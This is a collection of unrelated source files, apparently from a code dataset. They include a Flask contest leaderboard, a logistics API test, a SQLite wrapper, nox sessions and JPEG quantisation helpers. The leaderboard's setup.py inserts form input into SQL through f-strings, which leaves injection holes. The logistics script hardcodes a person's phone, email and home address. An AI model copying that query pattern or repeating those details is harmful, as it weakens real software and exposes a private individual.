comm.replace('[', '').replace(']', '')\n comm = comm.replace('(', '').replace(')', '')\n comm = comm.replace('{', '').replace('}', '').strip()\n\n has_setup = ':' in comm\n comm_list = [x.strip() for x in re.split(':|,|/', comm)]\n if len(comm_list) == 0:\n return parts\n\n parts['interchange'] = comm_list[-1] if len(comm_list[-1]) < len(comm_list[-2]) else comm_list[-2]\n parts['insertion'] = comm_list[-1] if len(comm_list[-1]) > len(comm_list[-2]) else comm_list[-2]\n if has_setup:\n parts['setup'] = comm_list[0]\n\n return parts\n \n\n\nif __name__ == \"__main__\":\n \"\"\"\n comm = input()\n print(comm_to_moves(comm))\n print(inverse_comm(comm))\n \"\"\"\n\n # multiple inputs\n comms = []\n while True:\n try:\n line = input()\n except EOFError:\n break\n comms.append(line)\n\n print()\n print()\n print(\"==============================\")\n for comm in comms:\n #print(comm_to_moves(comm))\n 
print(inverse_comm(comm))","sub_path":"cube_moves.py","file_name":"cube_moves.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"480042820","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : API_logistics_createOrder.py\n@Time : 2020-07-28 10:59\n@Author : Forest\n@Email : 17349766478@163.com\n@Software: PyCharm\n\"\"\"\ndef logistics_createOrder():\n import re,os\n import requests,time\n import json\n from config.config import HOSTL,sessionfile,logst\n from Lib.Get_read_Excel import read_file\n from Lib.Write_Excel import write_manage\n session = read_file(sessionfile)\n url = f\"{HOSTL}/sample/api/logistics/createOrder\"\n timenum = int(time.time())\n payload = {\n \"startContactName\":\"朱森林\",\n \"startContactPhone\":\"17349766478\",\n \"startStationAddress\":\"上海市松江区泗泾镇鼓楼公路1899弄36号801室,来的时候请提前打我电话或者在门卫门口等我\",\n \"orderEtd\":timenum,\n \"sampleIds\":\"3\"\n }\n headers = {\n 'Content-Type': \"application/json\",\n 'sessionId': session,\n }\n\n response = requests.request(\"POST\", url, data=json.dumps(payload), headers=headers)\n # print(response.json())\n if response.json()['code'] == 0:\n logisticsid = response.json()['data']['logisticsId']\n write_manage(logst,str(logisticsid))\n print('创建物流订单成功,物流号为:%s'%(logisticsid))\n else:\n print('重复下单,请先去取消订单')\n os._exit(0)\n print(logisticsid)\n import time\n print(int(time.time()))","sub_path":"ShuoShiJianKang/Lib/logistics/API_logistics_createOrder.py","file_name":"API_logistics_createOrder.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"642765319","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport os\n\nimport sqlite3\nfrom gcwatcher.cache import Cache\n\n__all__ = []\n\n\nclass Db:\n def __init__(self, dbFile):\n self.dbFile = dbFile\n self.conn = sqlite3.connect(dbFile)\n\n def init(self):\n self.conn.execute('''CREATE TABLE if not exists caches\n (id INT,\n gccode TEXT,\n guid TEXT,\n wpid INT,\n name TEXT,\n listing TEXT,\n hint TEXT,\n owner TEXT,\n lat REAL,\n lon REAL,\n difficulty REAL,\n terrain REAL,\n size REAL,\n updated timestamp)''')\n\n self.conn.execute('''CREATE TABLE if not exists cachedata\n (id INT,\n cacheid INT,\n key TEXT,\n lang TEXT,\n value TEXT,\n updated timestamp)''')\n\n self.conn.execute('''CREATE TABLE if not exists logs\n (id INT,\n cacheid INT,\n cacherid INT,\n value TEXT,\n updated timestamp)''')\n\n self.conn.execute('''CREATE TABLE if not exists cachers\n (id TEXT,\n guid TEXT,\n name TEXT,\n updated timestamp)''')\n\n def updateRecord(self, cache):\n r = (cache.getGcCode(),)\n found = self.conn.execute('SELECT * FROM caches where gccode = ?', r)\n\n r = (cache.getGUID(), cache.getName(), cache.getLat(), cache.getLon(), cache.getDifficulty(), cache.getTerrain(), cache.getSize(), cache.getGcCode())\n if next(found, None):\n self.conn.execute(\"UPDATE caches SET guid=?, name=?, lat=?, lon=?, difficulty=?, terrain=?, size=?, updated=datetime('now') WHERE gccode = ?\", r)\n else:\n self.conn.execute(\"INSERT INTO caches (guid, name, lat, lon, difficulty, terrain, size, gccode, updated) VALUES (\" + \",\".join('?'*len(r)) + \", datetime('now'))\", r)\n\n def getCacheByGccode(self, gccode):\n r = (gccode, )\n it = self.conn.execute(\"SELECT * FROM caches WHERE gccode = ?\", r)\n row = next(it, None)\n result = None\n if (row):\n result = Cache()\n return result\n\n def getCacheByGuid(self, guid):\n r = 
(guid, )\n it = self.conn.execute(\"SELECT * FROM caches WHERE guid = ?\", r)\n row = next(it, None)\n result = None\n if (row):\n result = Cache()\n return result\n\n def cacheExists(self, wp = None, guid = None):\n if wp:\n return (self.getCacheByGccode(wp) != None)\n elif guid:\n return (self.getCacheByGuid(guid) != None)\n\n raise Exception('cacheExists: missing argumens')\n\n def commit(self):\n self.conn.commit()\n\n def close(self):\n self.commit()\n self.conn.close()\n\n\nif __name__ == '__main__':\n\n os.remove('tmp/test.db')\n db = Db('tmp/test.db')\n\n db.init()\n cache = Cache(\"GC123\", \"000-000\", \"test cache\")\n db.updateRecord(cache)\n\n cache.setLat(\"50.099\")\n cache.setLon(\"15.999\")\n db.updateRecord(cache)\n db.commit()\n db.close()\n","sub_path":"gcwatcher/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"278234946","text":"import functools\nimport glob\nimport subprocess\n\nimport nox\n\nLINT_ITEMS = \"nox.py\", \"docs/source/conf.py\", \"zazo\", \"tests\"\n\n\n@nox.session\ndef docs(session):\n session.install(\"-r\", \"tools/reqs/docs.txt\")\n\n session.run(\"sphinx-build\", \"-n\", \"-b\", \"html\", \"docs/source\", \"docs/build\")\n\n\n@nox.session\ndef packaging(session):\n session.install(\"-r\", \"tools/reqs/packaging.txt\")\n\n session.run(\"flit\", \"build\")\n\n\ndef lint_session(func):\n\n @functools.wraps(func)\n def wrapped(session):\n if session.posargs:\n files = session.posargs\n else:\n files = LINT_ITEMS\n session.install(\"--pre\", \"-r\", \"tools/reqs/lint.txt\")\n\n session.run(\"black\", \"--version\")\n session.run(\"isort\", \"--version\")\n session.run(\"mypy\", \"--version\")\n\n return func(session, files)\n\n return wrapped\n\n\n@nox.session\n@lint_session\ndef lint(session, files):\n session.run(\"black\", \"--check\", *files)\n session.run(\"isort\", \"--check-only\", \"--diff\", \"--recursive\", *files)\n session.run(\"mypy\", \"--ignore-missing-imports\", \"--check-untyped-defs\", \"zazo\")\n session.run(\n \"mypy\", \"-2\", \"--ignore-missing-imports\", \"--check-untyped-defs\", \"zazo\"\n )\n\n\n@nox.session\n@lint_session\ndef lint_format(session, files):\n session.run(\"black\", *files)\n session.run(\"isort\", \"--recursive\", *files)\n\n\n@nox.session\n@nox.parametrize(\"python_version\", [\"2.7\", \"3.4\", \"3.5\", \"3.6\", \"3.7\", \"pypy\", \"pypy3\"])\ndef test(session, python_version):\n # Set the interpreter\n if python_version.startswith(\"pypy\"):\n session.interpreter = python_version\n else:\n session.interpreter = \"python\" + python_version\n\n # Build the package.\n # THIS IS A HACK\n # Working around all kinds of weird nox + flit + Travis CI behavior.\n # We're building a wheel here and installing it with session.install since\n # nox is declarative but we need to run the build command before executing\n # code.\n def my_run(*args):\n print(\"run > \" + \" \".join(args))\n try:\n subprocess.check_call(args)\n except subprocess.CalledProcessError:\n session.error(\"Command failed.\")\n\n my_run(\"python3\", \"-m\", \"flit\", \"build\")\n files = glob.glob(\"./dist/*.whl\")\n if not files:\n session.error(\"Could not find any built wheels.\")\n\n # Install the package and test dependencies.\n session.install(*files)\n session.install(\"-r\", \"tools/reqs/test.txt\")\n\n # Run the tests\n session.cd(\"tests\") # we change directory to avoid the cwd ambiguity\n session.run(\"pytest\", 
*session.posargs)\n","sub_path":"nox.py","file_name":"nox.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"536296972","text":"from point import point\nfrom kd_tree import kd_tree\nfrom graph import myGraph\n \ndef driver1():\n obj = kd_tree(2)\n arr = []\n cid = 0\n for i in range(0,10):\n for j in range(0,10):\n arr.append(point(name=cid, dim=2, coordinate=[i,j]))\n cid += 1\n swap = myGraph(2)\n for i in arr:\n t = swap.insertNode(i, key=i.name, cost=0)\n\n t = swap.k_center_main(10,2)\n swap.plot()\n\n\ndef driver2():\n obj = kd_tree(3)\n arr = []\n cid = 0\n for i in range(0,15):\n for j in range(0,15):\n for k in range(0,15):\n arr.append(point(name=cid, dim=3, coordinate=[i,j,k]))\n cid += 1\n swap = myGraph(3)\n for i in arr:\n t = swap.insertNode(i, key=i.name, cost=0)\n input(\"ABOUT TO CALL K CENTER\")\n t = swap.k_center_main(100,10)\n print(\"k_center complete\")\n swap.plot3()\n\n\ndriver1()\ninput(\"\")\n","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"649999330","text":"from django.forms import ModelForm\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit, Layout, Field, Div, Fieldset\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .models import Rsvp\n\n\nclass RsvpForm(ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-xs-12 col-sm-4 col-md-4'\n self.helper.field_class = 'col-xs-12 col-sm-8 col-md-8'\n self.helper.layout = Layout(\n Fieldset(\n 'OSA formulär',\n 'name',\n 'email',\n 'telephone_number',\n 'food_preference',\n Div(\n 'next_day',\n Submit('submit', _('Submit')),\n css_class='col-sm-offset-4',\n ),\n )\n )\n\n class Meta:\n model = Rsvp\n","sub_path":"RsvpForm/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"608019502","text":"import math\nimport xboa.common\n\nclass PzCalculator(object):\n def __init__(self, config):\n self.config = config\n self.c_light = xboa.common.constants[\"c_light\"]\n self.mass = xboa.common.pdg_pid_to_mass[13]\n\n def get_separation_z(self, event, z):\n tku = event[\"data_in\"]\n tkd = event[\"data_out\"]\n rx = (tku[0] + tku[1]*(z-self.config.z_tku)) - \\\n (tkd[0] + tkd[1]*(z-self.config.z_tkd))\n ry = (tku[2] + tku[3]*(z-self.config.z_tku)) - \\\n (tkd[2] + tkd[3]*(z-self.config.z_tkd))\n r = (rx**2 + ry**2)**0.5\n return r\n\n def get_path_length(self, event):\n tku = event[\"data_in\"]\n tkd = event[\"data_out\"]\n ptu = (tku[1]**2 + tku[3]**2)**0.5\n zu = self.config.z_fc-self.config.z_tof1\n path_length_u = zu/math.cos(math.atan(ptu))\n\n ptd = (tkd[1]**2 + tkd[3]**2)**0.5\n zd = self.config.z_tof2 - self.config.z_fc\n path_length_d = zd/math.cos(math.atan(ptd))\n\n path_length = path_length_u + path_length_d\n return path_length\n\n def get_p_tot(self, event):\n if event[\"data_in\"] == None or event[\"data_out\"] == None or event[\"tof12\"] == None:\n return None, None, None\n path_length = self.get_path_length(event)\n beta = path_length/(event[\"tof12\"])/self.c_light\n if beta >= 1 or beta < 0:\n return None, None, None\n gamma = 1/(1-beta**2)**0.5\n p_tot = 
self.mass*beta*gamma\n miss_distance = self.get_separation_z(event, self.config.z_fc)\n return p_tot, path_length, miss_distance\n\n","sub_path":"scripts/old/pz_calculator.py","file_name":"pz_calculator.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"618239131","text":" \r\nimport os\r\nimport psycopg2\r\nimport datetime\r\nfrom flask import Flask, render_template,request,redirect,url_for\r\nimport json\r\nimport requests\r\nimport sqlite3 as sql\r\n\r\nbot_programming = \"fantastic-bits\"\r\nDATABASE_URL = os.environ['DATABASE_URL']\r\napp = Flask(__name__)\r\ninfo = []\r\nfirst = []\r\nfinal = []\r\n\r\ndef bot_programming_getter():\r\n a=[\"fantastic-bits\",\"tulips-and-daisies\",\"a-code-of-ice-and-fire\"]\r\n winner=[0,0,0]\r\n votes=retrievevote()\r\n for v in votes:\r\n v=v[0]\r\n for b in range(len(a)):\r\n if v == a[b]:\r\n vo=b\r\n winner[vo] += 1\r\n print(winner)\r\n m=-1\r\n for c in range(len(winner)):\r\n b=winner[c]\r\n if b > m:\r\n m=b\r\n ret=a[c]\r\n return ret\r\n\r\ndef check_time(tn):\r\n date = 10\r\n month = 10\r\n hour = 5\r\n minute = 0\r\n date_today = int(tn.strftime(\"%d\"))\r\n month_now = int(tn.strftime(\"%m\"))\r\n hour_now = int(tn.strftime(\"%H\"))\r\n minute_now = int(tn.strftime(\"%M\"))\r\n date+=month*30\r\n hour+=date*24\r\n minute+=hour*60\r\n date_today+=month_now*30\r\n hour_now+=date_today*24\r\n minute_now+=hour_now*60\r\n if minute <= minute_now and int(tn.strftime(\"%y\")) == 20:\r\n return True\r\n return False\r\n\r\ndef check_end_time(tn):\r\n date = 20\r\n month = 10\r\n hour = 5\r\n minute = 0\r\n date_today = int(tn.strftime(\"%d\"))\r\n month_now = int(tn.strftime(\"%m\"))\r\n hour_now = int(tn.strftime(\"%H\"))\r\n minute_now = int(tn.strftime(\"%M\"))\r\n date+=month*30\r\n hour+=date*24\r\n minute+=hour*60\r\n date_today+=month_now*30\r\n hour_now+=date_today*24\r\n minute_now+=hour_now*60\r\n if minute <= minute_now and int(tn.strftime(\"%y\")) == 20:\r\n return True\r\n return False\r\n\r\ndef check_re_time(tn):\r\n date = 15\r\n month = 10\r\n hour = 5\r\n minute = 0\r\n date_today = int(tn.strftime(\"%d\"))\r\n month_now = int(tn.strftime(\"%m\"))\r\n hour_now = int(tn.strftime(\"%H\"))\r\n minute_now = int(tn.strftime(\"%M\"))\r\n date+=month*30\r\n hour+=date*24\r\n minute+=hour*60\r\n date_today+=month_now*30\r\n hour_now+=date_today*24\r\n minute_now+=hour_now*60\r\n if minute <= minute_now and int(tn.strftime(\"%y\")) == 20:\r\n return True\r\n return False\r\n\r\ndef get_rankings(bot):\r\n Leaderboard=[]\r\n leagues = [\"legend\",\"gold\",\"silver\",\"bronze\",\"wood1\",\"wood2\",\"wood3\"]\r\n for name in leagues:\r\n try:\r\n cg = requests.post('https://www.codingame.com/services/Leaderboards/getFilteredPuzzleLeaderboard',json = [bot,\"c96627d7b482084183f526c125ae497b\",\"global\",{\"active\":True,\"column\":\"LEAGUE\",\"filter\":name}]) \r\n Leaderboard.extend(cg.json()['users'])\r\n except:\r\n pass\r\n return Leaderboard\r\n\r\ndef str_leaderboard():\r\n bot_programming=bot_programming_getter()\r\n leda=get_rankings(bot_programming)\r\n a=\"\"\r\n for i in leda:\r\n try:\r\n a+=str(i['pseudo'])+\"|\"+str(i['rank'])+\" \"\r\n except:\r\n pass\r\n a=a[:-1]\r\n return a\r\n\r\ndef update_first():\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n l=str_leaderboard()\r\n sqlite_insert_with_param = f\"UPDATE initial_rank SET leaderboard = '{l}' WHERE id = 'a';\"\r\n 
cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n\r\ndef update_final(save):\r\n a=\"\"\r\n for i in save:\r\n for k in i:\r\n a+=str(k)+\"|\"\r\n a=a[:-1]\r\n a+=\" \"\r\n a=a[:-1]\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n sqlite_insert_with_param=f\"UPDATE final_rank SET leaderboard = '{a}' WHERE id='a';\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n\r\ndef createfirstleaderboard():\r\n print(\"creating table\")\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n cur.execute(\"CREATE TABLE initial_rank(id TEXT,leaderboard TEXT)\")\r\n print(\"created table\")\r\n con.commit()\r\n cur=con.cursor()\r\n l=str_leaderboard()\r\n sqlite_insert_with_param = f\"INSERT INTO initial_rank(id,leaderboard) VALUES ('a','{l}');\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n\r\ndef createfinalleaderboard():\r\n print(\"creating table\")\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n cur.execute(\"CREATE TABLE final_rank(id TEXT,leaderboard TEXT)\")\r\n con.commit()\r\n print(\"created table\")\r\n cur=con.cursor()\r\n sqlite_insert_with_param = f\"INSERT INTO final_rank(id,leaderboard) VALUES ('a','a');\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n\r\ndef get_final():\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n cur.execute(\"SELECT leaderboard FROM final_rank\")\r\n a=cur.fetchall()\r\n a=a[0]\r\n a=a[0]\r\n s=a.split()\r\n r=[]\r\n for i in s:\r\n r.append(i.split(\"|\"))\r\n return r\r\n\r\ndef createvoterlist():\r\n print(\"creating table\")\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n table=\"\"\"\r\n CREATE TABLE vote (\r\n name TEXT\r\n )\r\n \"\"\"\r\n cur.execute(table)\r\n con.commit()\r\n print(\"created table\")\r\n\r\ndef insertvote(vote):\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n sqlite_insert_with_param = f\"INSERT INTO vote(name) VALUES ('{vote}');\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n con.close()\r\n\r\ndef retrievevote():\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n cur.execute(\"SELECT name FROM vote\")\r\n users = cur.fetchall()\r\n con.close()\r\n return users\r\n\r\ndef createtable():\r\n print(\"creating table\")\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n table=\"\"\"\r\n CREATE TABLE Participa (\r\n name TEXT\r\n )\r\n \"\"\"\r\n cur.execute(table)\r\n con.commit()\r\n print(\"created table\")\r\n\r\ndef insertUser(nam):\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n sqlite_insert_with_param = f\"INSERT INTO Participa(name) VALUES ('{nam}');\"\r\n print(sqlite_insert_with_param)\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n con.close()\r\n\r\ndef retrieveUsers():\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n cur.execute(\"SELECT name FROM Participa\")\r\n users = cur.fetchall()\r\n con.close()\r\n return users\r\n\r\ndef initial_rank(user,curr_leaderboard):\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n cur.execute(\"SELECT leaderboard FROM initial_rank\")\r\n l = cur.fetchall()\r\n con.close()\r\n l=l[0]\r\n l=l[0]\r\n l=l.split()\r\n for p in l:\r\n p=p.split(\"|\")\r\n if p[0] == user:\r\n return int(p[1])\r\n return 
len(curr_leaderboard)\r\n\r\ndef scrape_data(part):\r\n global info\r\n participants=[]\r\n for n in part:\r\n participants.append(n[0])\r\n info=[]\r\n data=[]\r\n leagueFinder = {0:'wood 2', 1:'wood 1', 2:'bronze', 3:'silver', 4:'gold', 5:'legend'}\r\n bot_programming=bot_programming_getter()\r\n print(bot_programming)\r\n if bot_programming == \"a-code-of-ice-and-fire\":\r\n leagueFinder = {0:'wood 3', 1:'wood 2', 2:'wood 1', 3:'bronze', 4:'silver', 5:'gold',6:'legend'}\r\n leaderboard=get_rankings(bot_programming)\r\n if check_time(datetime.datetime.now()) == False:\r\n update_first()\r\n for cgdata in leaderboard:\r\n try:\r\n if (cgdata['pseudo'] in participants or cgdata['pseudo'].lower() in participants) and cgdata['pseudo'] != \"aaaa111\":\r\n username = cgdata['pseudo']\r\n cgrank = cgdata['rank']\r\n lerank = cgdata['localRank']\r\n points = cgdata['score']\r\n league = leagueFinder[cgdata['league']['divisionIndex']]\r\n league = league.replace(\" \",\"\")\r\n player = cgdata['codingamer']\r\n country = player['countryId']\r\n language = cgdata['programmingLanguage']\r\n sub=\"No\"\r\n progress = cgdata['percentage']\r\n if progress != 100:\r\n sub=\"yes\"\r\n rank_progress=initial_rank(cgdata['pseudo'],leaderboard)-cgrank\r\n data.append([username,cgrank,lerank,points,league,language,country,sub,progress,rank_progress])\r\n except Exception as e:\r\n print(e)\r\n data.sort(key = lambda a:a[1])\r\n for p in range(len(data)):\r\n info.append([p+1,data[p][0],data[p][1],data[p][2],data[p][3],data[p][4],data[p][5],data[p][6],data[p][7],data[p][8],data[p][9]])\r\n if check_end_time(datetime.datetime.now()) == False:\r\n update_final(info)\r\n else:\r\n info=get_final()\r\n\r\ndef scrape_data_progression(fo):\r\n pr = fo\r\n pr.sort(key = lambda a: int(a[10])*-1)\r\n for i in range(len(pr)):\r\n pr[i][0] = i+1\r\n return pr\r\n@app.route(\"/\")\r\ndef main():\r\n try:\r\n createtable()\r\n except:\r\n print(\"table is already there\")\r\n try:\r\n createvoterlist()\r\n except:\r\n print(\"voter list is there\")\r\n try:\r\n createfirstleaderboard()\r\n except:\r\n print(\"Leaderboard table is there\")\r\n try:\r\n createfinalleaderboard()\r\n except:\r\n print(\"Final leaderboard table is already there\")\r\n return redirect(url_for(\"home\"))\r\n\r\n@app.route(\"/home\",methods=[\"GET\",\"POST\"])\r\ndef home():\r\n if request.method == \"GET\":\r\n return render_template(\"home.html\")\r\n else:\r\n log = request.form['sub']\r\n if log == \"Register\":\r\n return redirect(url_for(\"registeration\"))\r\n elif log == \"Leaderboard\":\r\n return redirect(url_for(\"leaderboard\"))\r\n else:\r\n return redirect(url_for(\"progression\"))\r\n\r\n@app.route(\"/registeration\",methods=[\"GET\",\"POST\"])\r\ndef registeration():\r\n if request.method == \"GET\":\r\n return render_template(\"register.html\",voting=check_time(datetime.datetime.now()))\r\n else:\r\n if check_re_time(datetime.datetime.now()):\r\n return render_template(\"Error.html\",code=\"You are late registration closed....\")\r\n name = request.form['id']\r\n try:\r\n vote = request.form['vote']\r\n except:\r\n if check_time(datetime.datetime.now()) == False:\r\n return render_template(\"Error.html\",code = f\"{name} you didn't vote.\")\r\n try:\r\n all_p=retrieveUsers()\r\n new=True\r\n for p in all_p:\r\n if p[0] == name:\r\n new=False\r\n break\r\n if new:\r\n insertUser(name)\r\n try:\r\n insertvote(vote)\r\n print(vote)\r\n except:\r\n pass\r\n else:\r\n return render_template(\"Error.html\",code=f\"{name} already 
registered....\")\r\n return redirect(url_for(\"leaderboard\"))\r\n except Exception as e:\r\n return render_template(\"Error.html\",code=f\"{name} can't register, retry... error = {e}\")\r\n\r\n@app.route(\"/leaderboard\")\r\ndef leaderboard():\r\n try:\r\n part=retrieveUsers()\r\n scrape_data(part)\r\n bo=bot_programming_getter()\r\n msg=f\"The Contest is About {bo}\"\r\n p=len(set(part))\r\n end=\"\"\r\n if check_end_time(datetime.datetime.now()):\r\n end=\".Contest Ended.\"\r\n print(check_time(datetime.datetime.now()))\r\n print(check_end_time(datetime.datetime.now()))\r\n print(\"debug\")\r\n print(msg)\r\n print(\"End debug\")\r\n if check_time(datetime.datetime.now()) == False:\r\n msg=\"Bot programming is a suspense..\"\r\n return render_template(\"leaderboard.html\",message=\"Total registered players = \"+str(p),msg=msg)\r\n return render_template(\"leaderboard.html\",players = info,message=\"Total registered players = \"+str(p)+end,msg=msg)\r\n except Exception as e:\r\n return render_template(\"Error.html\",code=f\"Error in retrieving users or taking data from CG,error = {e}\")\r\n\r\n@app.route(\"/progression\")\r\ndef progression():\r\n try:\r\n part=retrieveUsers()\r\n scrape_data(part)\r\n fo = scrape_data_progression(info)\r\n msg=f\"Leaderboard based on Progression\"\r\n p=len(set(part))\r\n end=\"\"\r\n if check_end_time(datetime.datetime.now()):\r\n end=\".Contest Ended.\"\r\n print(check_time(datetime.datetime.now()))\r\n print(check_end_time(datetime.datetime.now()))\r\n print(\"debug\")\r\n print(msg)\r\n print(\"End debug\")\r\n if check_time(datetime.datetime.now()) == False:\r\n msg=\"Bot programming is a suspense..\"\r\n return render_template(\"leaderboard.html\",message=\"Total registered players = \"+str(p),msg=msg)\r\n return render_template(\"leaderboard.html\",players = fo,message=\"Total registered players = \"+str(p)+end,msg=msg)\r\n except Exception as e:\r\n return render_template(\"Error.html\",code=f\"Error in retrieving users or taking data from CG,error = {e}\")\r\n\r\n@app.route(\"/data\")\r\ndef data():\r\n try:\r\n part=retrieveUsers()\r\n print(part)\r\n votes=retrievevote()\r\n print(votes)\r\n return render_template(\"leaderboard.html\",players = part)\r\n except:\r\n return render_template(\"Error.html\",code=\"1\")\r\n\r\n@app.route(\"/before_leaderboard\")\r\ndef before_leaderboard():\r\n try:\r\n part=retrieveUsers()\r\n scrape_data(part)\r\n bo=bot_programming_getter()\r\n msg=f\"The Contest is About {bo}\"\r\n print(\"debug\")\r\n print(msg)\r\n print(\"End debug\")\r\n return render_template(\"leaderboard.html\",players = info,msg=msg,message=str(datetime.datetime.now()))\r\n except:\r\n return render_template(\"Error.html\",code=\"Error in retrieving users or taking data from CG\")\r\n\r\nif __name__ == \"__main__\":\r\n app.run()\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":14017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
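The setup.py record above assembles every SQL statement by f-string interpolation of request data (for example INSERT INTO Participa(name) VALUES ('{nam}')), which is open to SQL injection. A minimal sketch of the parameterized form that psycopg2 supports, reusing DATABASE_URL and the Participa table from the sample above; the function name insert_user_safe is hypothetical, not part of the original code:

    import psycopg2

    def insert_user_safe(nam):
        # %s placeholders let psycopg2 escape the value itself instead of
        # splicing raw user input into the statement text.
        con = psycopg2.connect(DATABASE_URL, sslmode='require')  # DATABASE_URL assumed defined as in the sample
        cur = con.cursor()
        cur.execute("INSERT INTO Participa(name) VALUES (%s);", (nam,))
        con.commit()
        con.close()

The same placeholder style would apply to the UPDATE and SELECT helpers in that file.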
s\n","sub_path":"python/leetcode/string/reverse_string.py","file_name":"reverse_string.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"496047283","text":"from tab_jpeg import Q\r\nimport numpy as np\r\n\r\ndef codificadorQuantificacao (arr, q):\r\n \r\n imagem = arr.copy()\r\n \r\n for i in range(len(imagem)):\r\n imagem[i] = np.divide(imagem[i], (Q * fatorQualidade(q)))\r\n \r\n return np.rint(imagem)\r\n\r\n\r\ndef descodificadorQuantificacao (arr, q):\r\n \r\n imagem = arr.copy()\r\n \r\n for i in range(len(imagem)):\r\n imagem[i] = np.multiply(imagem[i], (Q * fatorQualidade(q)))\r\n \r\n return imagem\r\n\r\ndef fatorQualidade (q):\r\n if(q <= 50):\r\n a = 50.0 / q\r\n else:\r\n a = 2.0 - (q * 2.0)/100.0\r\n return a ","sub_path":"Quantificacao.py","file_name":"Quantificacao.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"548297408","text":"from flask import render_template\r\nfrom app import app\r\n\r\nfrom flask import render_template, flash, redirect, url_for, request\r\nfrom app import app, db\r\nfrom app.models import User, Post\r\nfrom .forms import LoginForm, RegisterForm, EditProfileForm, CreatePostForm\r\nfrom flask_login import login_required, login_user, logout_user, current_user\r\nimport datetime\r\nimport time\r\nimport pytz\r\nimport feedparser\r\n\r\nCARDS_PER_PAGE = 5\r\n\r\n\r\n@app.before_request\r\ndef before_request():\r\n if current_user.is_authenticated:\r\n current_user.last_seen = datetime.datetime.utcnow()\r\n db.session.commit()\r\n\r\n\r\n# Главный адрес\r\n# Перенаправляет на /login, /admin, /counter\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n if current_user.is_authenticated:\r\n if current_user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n return redirect(url_for('login'))\r\n\r\n\r\n# Авторизация\r\n# Вход в аккаунт или переход к регистрации\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if current_user.is_authenticated:\r\n if current_user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n form = LoginForm()\r\n if form.validate_on_submit():\r\n user = User.query.filter_by(username=form.username.data).first()\r\n if user is None or not user.check_password(form.password.data):\r\n flash('Invalid username or password')\r\n return redirect(url_for('login'))\r\n\r\n login_user(user, remember=form.remember_me.data)\r\n\r\n if user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n return render_template('login.html',\r\n title='Вход',\r\n form=form)\r\n\r\n\r\n# Выход из аккаунта\r\n# Выходит и пересылает на логин\r\n@app.route('/logout/')\r\ndef logout():\r\n logout_user()\r\n flash(\"Вы успешно вышли из аккаунта.\")\r\n return redirect(url_for('login'))\r\n\r\n\r\n# Регистрация\r\n# Форма регистрации с редиректом на логин\r\n# Можно зарегаться только как юзер\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef register():\r\n if current_user.is_authenticated:\r\n return redirect(url_for('index'))\r\n\r\n form = RegisterForm()\r\n\r\n if form.validate_on_submit():\r\n user = User(username=form.username.data)\r\n\r\n user.set_password(form.password.data)\r\n\r\n db.session.add(user)\r\n db.session.commit()\r\n\r\n 
